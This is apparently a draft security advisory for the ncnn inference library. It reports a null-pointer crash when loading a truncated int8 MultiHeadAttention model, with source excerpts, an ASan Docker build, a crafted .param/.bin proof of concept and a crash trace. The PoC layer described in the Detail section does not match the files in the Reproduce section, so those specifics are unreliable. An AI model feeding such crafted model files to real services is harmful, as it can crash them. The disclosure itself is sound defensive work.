All advisories
Draft

Null Dereference in Int8 Model Loading

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Null Dereference in Int8 Model Loading

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/multiheadattention.cpp:220 in MultiHeadAttention::load_model(const ModelBin&)
Sanitizer verdict: SEGV on unknown address 0x000000000000 (pc 0x6363961fffe5 bp 0x7ffd3bf3bb00 sp 0x7ffd3bf3a520 T0)

Summary

A truncated attacker-supplied .bin crashes ncnn while loading an int8-quantized MultiHeadAttention layer. MultiHeadAttention::load_model checks every weight and bias read with .empty(), but loads the final output-weight int8 scale as mb.load(1, 1)[0], subscripting the result before it can be tested. At end-of-file ModelBin returns an empty Mat, and element zero of it is a read of address 0x0. Confirmed through ncnnoptimize mha_truncated.param mha_truncated.bin out.param out.bin 0; ncnn::Net::load_model on an untrusted model reaches the same line.

Detail

The untrusted fields are the MultiHeadAttention parameter key 18 (quantize_term) and the length of the weight stream. load_param accepts any quantize_term that is not 4, 5 or 6 and is below 400 without a matching weight-block configuration, so the plain int8 value 1 passes. load_model then reads eight weight/bias blocks, each guarded, before falling into the int8 block where three scale arrays are loaded unchecked and the fourth is immediately subscripted:

// src/layer/multiheadattention.cpp:206
    out_weight_data = mb.load(qdim * embed_dim, 0);
    if (out_weight_data.empty())
        return -100;

    out_bias_data = mb.load(qdim, 1);
    if (out_bias_data.empty())
        return -100;

#if NCNN_INT8
    if (quantize_term)
    {
        q_weight_data_int8_scales = mb.load(embed_dim, 1);
        k_weight_data_int8_scales = mb.load(embed_dim, 1);
        v_weight_data_int8_scales = mb.load(embed_dim, 1);
        out_weight_data_int8_scale = mb.load(1, 1)[0];
    }
#endif // NCNN_INT8

ModelBinFromDataReader::load logs "ModelBin read weight_data failed 0" and returns Mat() when the reader is exhausted (src/modelbin.cpp:317-318), and Mat::operator[] is an unchecked ((float*)data)[i] over a null data pointer.

The PoC layer is MultiHeadAttention mha 3 1 q k v out 0=1 1=1 2=1 3=1 4=1 18=1, so embed_dim, kdim, vdim and weight_data_size are all 1 and qdim = weight_data_size / embed_dim = 1. gen_poc.py emits exactly four twelve-byte records — a tag word plus one weight float plus one bias float — which satisfy the q, k, v and out weight/bias loads, then three bare floats that satisfy the q, k and v scale arrays. The stream ends there, so the fourth mb.load(1, 1) returns empty and [0] faults on the very next instruction.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-null-dereference-in-int8-model-loading && cd ncnn-poc-null-dereference-in-int8-model-loading

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > mha_truncated.param <<'EOF'
7767517
2 2
Input q 0 1 q
MultiHeadAttention mha 1 1 q out 0=1 2=1 18=1
EOF

base64 -d > mha_truncated.bin <<'EOF'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize mha_truncated.param mha_truncated.bin out.param out.bin 0

AddressSanitizer output:

ModelBin read weight_data failed 0
ModelBin read weight_data failed 0
ModelBin read weight_data failed 0
ModelBin read weight_data failed 0
AddressSanitizer:DEADLYSIGNAL
=================================================================
==1==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x59df38e0dfe5 bp 0x7ffdb26030a0 sp 0x7ffdb2601ac0 T0)
==1==The signal is caused by a READ memory access.
==1==Hint: address points to the zero page.
    #0 0x59df38e0dfe5 in ncnn::MultiHeadAttention::load_model(ncnn::ModelBin const&) /ncnn/src/layer/multiheadattention.cpp:220
    #1 0x59df30991a84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
    #2 0x59df3099290a in ncnn::Net::load_model(_IO_FILE*) /ncnn/src/net.cpp:2257
    #3 0x59df30992c91 in ncnn::Net::load_model(char const*) /ncnn/src/net.cpp:2292
    #4 0x59df308a5caf in main /ncnn/tools/ncnnoptimize.cpp:2797
    #5 0x7218d4c631c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #6 0x7218d4c6328a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x59df30825624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /ncnn/src/layer/multiheadattention.cpp:220 in ncnn::MultiHeadAttention::load_model(ncnn::ModelBin const&)
==1==ABORTING

Credit

Zheng Yu @ DepthFirst